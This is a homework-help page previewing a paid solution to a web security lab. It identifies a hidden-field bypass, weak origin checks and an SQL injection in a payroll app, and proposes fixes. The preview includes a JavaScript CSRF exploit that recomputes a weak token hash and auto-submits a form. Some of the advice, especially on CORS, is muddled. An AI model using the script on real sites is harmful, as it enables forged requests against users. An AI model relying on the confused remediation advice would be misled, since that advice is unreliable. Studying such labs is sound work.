QuestionQuestion

Target 1:

1. Vulnerability list:
a. account.php file, line 16:
if ($action == 'save' && $_POST['U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c='] == 'U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=') {

b. account.php file, line 57:
<input type="hidden" name="U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=" value="U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=">

2. Descriptions:
a. In these lines of code, there are two parameters for the verification of the incoming form submits through the POST method in the HTTP, the first one is that the “action“ parameter is set to “save”, and the second one is a hidden attribute in the original form with both the name and the value "U3VtbWVyMjAxOFRhcmdldDFFYXN0ZXJFZ2c=" which can be obtained by inspecting the form html code with the Firefox inspector tool.

3. Solution:
a. The solution to this, is to use a serve side method to verify the credentials of the user when a POST request is submitted, cookie sessions can be implemented for this, but a more securely solution is to implement sessions variables to bind a web browser session to a specified user, along with this, a verification of the domain can be also implemented to filter those requests that come outside of the payroll system.

Target 2:
1. Vulnerability list and description:
a. The main vulnerability is the simple html code and the CORS mechanism that is not enable on this sever. So any attacker can mimic the payroll web system in order to make a web with the same look and feel.
2. Solution:
a. Server side must disable any CORS asynchronous request due to the same-origin security policy, allowing those requests tha come only from the same origin.

Target 3:
1. Vulnerability list:
a. auth.php file, lines 58 and 59:
$sql = "SELECT user_id, name, eid FROM users WHERE eid='$escaped_username' AND password='$hash'";
$userdata = $this->db->query($sql)->next();

2. Descriptions:
a. In these lines of code, the $escaped_username variable can be injected with malicious code using the username parameter in order to produce a $userdata variable that can hold real username values form the database.

3. Solution:
In order to solve this, the $username and $password parameters from the login function in the auth.php file, must be cleaned from these malicious injected SQL code, there are to main methods to achieve this, the first method is by using prepared statements which are string SQL templates, and by parsing this template the engine can avoid any injection; the second method is to use parameterized queries, which apply a binding to the query before executing the query to the SQL database, in this process any SQL injection is catched.

Solution PreviewSolution Preview

These solutions may offer step-by-step problem-solving explanations or good writing examples that include modern styles of formatting and construction of bibliographies out of text citations and references. Students may use these solutions for personal skill-building and practice. Unethical use is strictly forbidden.

<script>

function exploit(){
// fairly trivial string hashing function
String.prototype.hashCode = function(){
var hash = 1;
for (i = 0; i < this.length; i++) {
hash = (13337 * hash + this.charCodeAt(i)) % 100000;
}
return hash;
}

var a = document.getElementById('account');
var r = document.getElementById('route');
var challenge = document.getElementById('csrfc');
document.getElementById('csrfr').value = (a.value+challenge.value+r.value).hashCode();

console.log(document.getElementById('csrfr').value);
// return;

document.forms[0].submit();
}

</script>...

By purchasing this solution you'll be able to access the following files:
Solution.zip.

50% discount

Hours
Minutes
Seconds
$40.00 $20.00
for this solution

or FREE if you
register a new account!

PayPal, G Pay, ApplePay, Amazon Pay, and all major credit cards accepted.

Find A Tutor

View available Web Development (HTML, XML, PHP, JavaScript, Adobe, Flash, etc.) Tutors

Get College Homework Help.

Are you sure you don't want to upload any files?

Fast tutor response requires as much info as possible.

Decision:
Upload a file
Continue without uploading

SUBMIT YOUR HOMEWORK
We couldn't find that subject.
Please select the best match from the list below.

We'll send you an email right away. If it's not in your inbox, check your spam folder.

  • 1
  • 2
  • 3
Live Chats